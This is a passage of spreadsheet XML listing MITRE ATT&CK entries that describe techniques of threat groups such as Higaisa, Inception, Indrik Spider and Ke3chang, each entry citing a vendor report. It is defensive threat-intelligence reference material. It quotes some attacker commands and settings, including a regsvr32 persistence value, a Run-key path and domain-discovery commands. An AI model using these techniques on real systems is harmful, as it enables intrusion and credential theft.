    <t>relationship--971d0828-7244-4278-adc5-dc480d57ba5b</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126)’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the &lt;code&gt;OINFO12.OCX&lt;/code&gt; dynamic link library.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--40b904c6-d77d-4ba8-98a5-c03d5c2a3186</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--fa22812f-01a4-420a-be11-7cb5822026e5</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) exfiltrated data over its C2 channel.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--382ab873-523f-4455-b3c5-74d81b4fc57b</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has exploited CVE-2018-0798 for execution.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--7b053a36-de7d-476b-bc06-6d712432d615</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a payload that creates a hidden window.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--a195cd11-43dc-4ad8-a48d-a1c705bb8b90</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) discovered system proxy settings and used them if available.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--49a11d2f-7945-4603-b409-d66420b94533</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used JavaScript to execute additional files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--8ef60c8b-f178-4b78-b5c4-76747e075d84</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used malicious e-mail attachments to lure victims into executing LNK files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--4ff8a2ad-2e69-4933-a5f4-201c891eef87</t>
  </si>
  <si>
    <t xml:space="preserve">[Higaisa](https://attack.mitre.org/groups/G0126) named a shellcode loader binary &lt;code&gt;svchast.exe&lt;/code&gt; to spoof the legitimate &lt;code&gt;svchost.exe&lt;/code&gt;.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) </t>
  </si>
  <si>
    <t>relationship--cf60408f-5101-4cdf-935f-c5436071d6d0</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has called various native OS APIs.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--1489621a-59eb-42a9-b529-adc37c65520c</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used Base64 encoded compressed payloads.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--54784a8e-d827-4761-87ce-68ed55cc25f9</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126)’s shellcode attempted to find the process ID of the current process.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--c6c5a455-14da-4d6f-8149-c0dc3bbd6f56</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a FakeTLS session for C2 communications.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--74fe4149-c5df-43a3-809a-5ece230b1cd7</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) added a spoofed binary to the start-up folder for persistence.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--c0792868-a5da-4486-9b3b-cefbc2667e54</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) dropped and added &lt;code&gt;officeupdate.exe&lt;/code&gt; to scheduled tasks.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--5fa551a6-dc9f-4ca5-a5ec-a393515cb618</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--853f320a-e611-4a23-9784-e0054f74b9e3</t>
  </si>
  <si>
    <t xml:space="preserve">[Higaisa](https://attack.mitre.org/groups/G0126) has sent spearphishing emails containing malicious attachments.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) </t>
  </si>
  <si>
    <t>relationship--645949a0-21a3-4c31-846d-33c2055d8bfd</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used AES-128 to encrypt C2 traffic.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--af052dd3-641e-4954-a08f-74d56ad29b53</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) collected the system volume serial number, GUID, and computer name.(Citation: PTSecurity Higaisa 2020)(Citation: Malwarebytes Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--63dec489-68ad-46c2-9972-55394ad7601a</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;ipconfig&lt;/code&gt; to gather network configuration information.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--d374ab1b-4ff8-4ee8-92d2-466581cf58c8</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a function to gather the current time.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--4113afe0-e84a-44ba-9180-3033de06d72e</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has used VBScript code on the victim's machine.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--0884b8fd-64b4-4736-b52d-0182d312b9bf</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--71db51a2-9968-408c-91b3-8f42a61d0b09</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;cmd.exe&lt;/code&gt; for execution.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--db2e5a57-1854-4925-9b78-422c9b79c130</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used an XSL file to run VBScript code.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>relationship--9dc630a6-a6fd-4173-8236-9bbb1041f7ea</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--ad3298b6-8cb5-4c4e-b2be-e058273c15be</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--86079dc0-0c46-4068-a2f1-9422d81a03be</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used specific malware modules to gather domain membership.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--bcf90f77-1b2b-46e2-914b-051e51a2d409</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</si>
  <si>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</si>
  <si>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relationship--b0702a30-f680-4f9b-99c3-352ce2a9557a</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a file listing plugin to collect information about file and directories both on local and remote drives.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--40e6721c-f5fd-4c51-aec9-93b70e7e312c</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</si>
  <si>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</si>
  <si>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relationship--6ee38990-50e9-423d-aea8-c3c16cf98ca4</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--864fdbd1-99fe-4036-a296-241c53337d85</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used chains of compromised routers to proxy C2 communications between them and cloud service providers.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--3bd9165f-6f5f-4c1a-bdbf-47c733d577a8</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--01323439-5287-43cd-b7d9-750e606db602</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used PowerShell to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--5b2457a6-a2b8-4809-a2a0-68d1c74bbb9b</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to identify active processes and other associated loaded modules.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--cece5cb5-3837-4551-be22-5c27b63eae63</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has maintained persistence by modifying Registry run key value 
 &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--1215a807-77b4-465e-9c82-c4f023e668da</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has ensured persistence at system boot by setting the value &lt;code&gt;regsvr32 %path%\ctfmonrn.dll /s&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--cab50f6d-3621-4429-8c9a-803df15f4e75</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has enumerated installed software on compromised systems.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--3c9c3d3d-a209-43dc-ae8d-53cd4c1de65c</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</si>
  <si>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</si>
  <si>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relationship--42580e44-781d-467d-b131-45f7d4651d0a</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has encrypted network communications with AES.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--cd89dfdb-5c48-4a91-ba2f-e3c6e74c5094</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to gather information about the operating system and hardware on the infected host.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--4b3f85b7-a7a4-446f-a3cb-d922268ee879</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used decoy documents to load malicious remote payloads via HTTP.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--c597beea-3bcd-45ee-a400-5b615f9ae621</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has obtained and used open-source tools such as [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--108b7d74-30a7-40ec-997e-b47c62a5f6e7</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used VBScript to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>relationship--c4c1e4e6-5662-42cd-86e1-fa7b3c82f84c</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--7fcb628d-ce4d-48a4-bb9f-b727fe54e6af</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>relationship--16d59476-9fff-413f-9dbe-5c9e43c3860d</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has established domains, some of which were designed to look like official government domains, for their operations.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--4db1e255-d845-459c-8553-39f1a278758f</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has compromised legitimate email accounts to use in their spearphishing operations.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--c291a0b4-31b5-4075-9672-b10b0e7bd4cc</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has downloaded additional files and tools from its C2 server.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--febc7399-bbee-4a97-b5a1-d2d9cf5ba9fc</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.(Citation: HackerNews IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--ecedc32f-3e97-4c2c-9b7e-d847baec8a44</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious password-protected RAR attachments.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--dd9e0f42-5d9d-4690-9d34-4e08a29d4868</t>
  </si>
  <si>
    <t xml:space="preserve">[IndigoZebra](https://attack.mitre.org/groups/G0136) has acquired open source tools such as [NBTscan](https://attack.mitre.org/software/S0590) and Meterpreter for their operations.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017) </t>
  </si>
  <si>
    <t>relationship--9bab41c7-1581-4c51-9119-6a5e29445979</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) created Dropbox accounts for their operations.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>relationship--a000579c-9149-4696-942f-e115d98eb96f</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to empty log files.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--4e45ac56-f9c8-4271-a3c8-1a618817945b</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used &lt;code&gt;wmic.exe&lt;/code&gt; to add a new user to the system.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--15033f82-efad-4db9-8d4c-015eeeeead64</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has encrypted domain-controlled systems using [BitPaymer](https://attack.mitre.org/software/S0570).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--a5ee5826-e742-4847-9816-d9124827262a</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used [PsExec](https://attack.mitre.org/software/S0029) to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--4ebab62f-3e2f-49b9-881d-26d2141d3e0b</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has collected credentials from infected systems, including domain accounts.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--739217f2-c273-4005-8175-1261a81a1224</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has created email accounts to communicate with their ransomware victims, to include providing payment and decryption details.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--bc156b29-534a-4156-b188-8f4a426a0e6c</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used Group Policy Objects to deploy batch scripts.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--89500cd9-c663-4b3e-bb20-b8fe1860891a</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has downloaded additional scripts, malware, and tools onto a compromised host.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--d9360852-584e-4980-9f9b-f56193bd3fc0</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used malicious JavaScript files for several components of their attack.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--b8fbce12-deae-4655-ac96-e23ebbeef624</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used [Cobalt Strike](https://attack.mitre.org/software/S0154) to carry out credential dumping using ProcDump.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--000aa4d0-315e-40d7-b2b6-76e91ecf0fe8</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has stored collected date in a .tmp file.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--5926c79d-b8a7-419a-b789-7e2ff1ee32b9</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has attempted to get users to click on a malicious zipped file.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--f30598a2-f1bd-41da-874c-9b883d54790d</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has developed malware for their operations, including ransomware such as [BitPaymer](https://attack.mitre.org/software/S0570) and [WastedLocker](https://attack.mitre.org/software/S0612).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--0b5cb547-b027-4a30-84de-d9d1df2495d0</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--2f33e27a-6fdf-4121-9e25-a307910b118f</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerShell [Empire](https://attack.mitre.org/software/S0363) for execution of malware.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--7005793f-b8da-49c5-8985-9d4476c3faaf</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--b2c02ae1-c62a-4811-a913-b0a26f605e38</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has served fake updates via legitimate websites that have been compromised.(Citation: Crowdstrike Indrik November 2018)	</t>
  </si>
  <si>
    <t>relationship--f7d3d7fc-e25f-4b1f-b7ea-7c19adb300bd</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [PsExec](https://attack.mitre.org/software/S0029) to stop services prior to the execution of ransomware.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>relationship--e2763cbf-c068-47b5-a871-3b20a368497f</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used the win32_service WMI class to retrieve a list of services from the system.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--342a3da9-79e7-4fdc-8a08-bd7f54caa2ac</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used batch scripts on victim's machines.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>relationship--8904d69b-a5ab-4e4c-b7c7-c437e7859b8a</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used WMIC to execute commands on remote computers.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>relationship--89fad9cc-d20b-43c4-a98d-105ff6642f2c</t>
  </si>
  <si>
    <t>The [Ke3chang](https://attack.mitre.org/groups/G0004) group has been known to compress data before exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--ab7eb363-c775-4065-a80d-1b324f22d0b8</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--bde913a9-9895-4414-b79a-3156159033aa</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed frequent and scheduled data collection from victim networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--53fb076c-5f59-45da-bbc2-94b5f3a3eb91</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed  frequent and scheduled data exfiltration from compromised networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--78ad31db-6b8e-4433-88b8-49c22994a2ab</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials to sign into victims’ Microsoft 365 accounts.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--f7ed42df-01c4-4441-95ce-68228e157abf</t>
  </si>
  <si>
    <t>Malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) can run commands on the command-line interface.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--a5a63d5c-acf7-4720-866d-fcf6e576a58f</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) malware RoyalDNS has used DNS for C2.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--96a7d789-70a9-42d8-a78e-b7ffd6c9dc69</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) gathered information and files from local directories for exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--8c763d80-4c50-4ebd-b2c6-3cad22c55bfa</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has deobfuscated Base64-encoded shellcode strings prior to loading them.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--352e6e5a-f1e0-46f8-826a-978981f6d893</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs account discovery using commands such as &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net group "REDACTED" /domain&lt;/code&gt; on specific permissions groups.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--20f863a1-f7de-4d66-a564-c4adee24fdbe</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs discovery of permission groups &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--b368c7c2-a593-45cb-b557-aac668a02656</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>relationship--49f2c182-bd69-4874-9102-b5fd1acac59c</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--7e834bba-4d5d-47b6-b689-b905eba66c0d</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has gained access through VPNs including with compromised accounts and stolen VPN certificates.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--60069193-4573-420f-9b2e-e9a42b95af12</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) uses command-line interaction to search files and directories.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--5c8fba10-9d8a-4257-a458-8f58efc8d912</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used [Mimikatz](https://attack.mitre.org/software/S0002) to generate Kerberos golden tickets.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--42049cfe-e374-4726-9832-3ad01d8466a5</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used tools to download files to compromised machines.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--1525d82a-05a7-4027-9d2d-02f8039d68b5</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used keyloggers.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--f39446a9-07d1-456a-b48b-241aab979e55</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using gsecdump.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--f3d30d20-ee51-4976-8611-5667df771567</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--c8db7b65-563d-47ba-9e06-cabdbade47e9</t>
  </si>
  <si>
    <t>relationship--15cccbec-2d40-4f28-a46e-c985bbb20c87</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has developed custom malware that allowed them to maintain persistence on victim networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--cb727277-5491-422f-ab40-1bd1be973d1e</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</si>
  <si>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</si>
  <si>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relationship--822688d0-d948-414f-b26a-2110d222a233</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used NTDSDump and other password dumping tools to gather credentials.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--c031bd06-453b-4f80-9a04-98e74a420323</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used Base64-encoded shellcode strings.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--9a823773-6bcc-4923-8f27-4729e771df2b</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs process discovery using &lt;code&gt;tasklist&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--c7e6d4a6-8d99-4134-848a-f4f712eb4316</t>
  </si>
  <si>
    <t>Several [Ke3chang](https://attack.mitre.org/groups/G0004) backdoors achieved persistence by adding a Run key.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--dcb733f7-0b36-4b25-82d4-c332810562a7</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>relationship--021885d8-90a5-4d70-91de-869783cd57d3</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used network scanning and enumeration tools, including [Ping](https://attack.mitre.org/software/S0097).(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>relationship--625ebfc0-7aaa-4eaf-8c49-be8b55c059d4</t>
  </si>
  <si>
